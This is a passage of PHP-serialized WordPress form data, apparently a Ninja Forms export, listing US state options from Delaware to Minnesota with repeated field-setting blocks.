Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"8\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"9\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"10\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"11\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"12\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"13\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"14\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"15\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"16\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"17\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"18\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"19\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"20\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"21\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"22\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"23\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 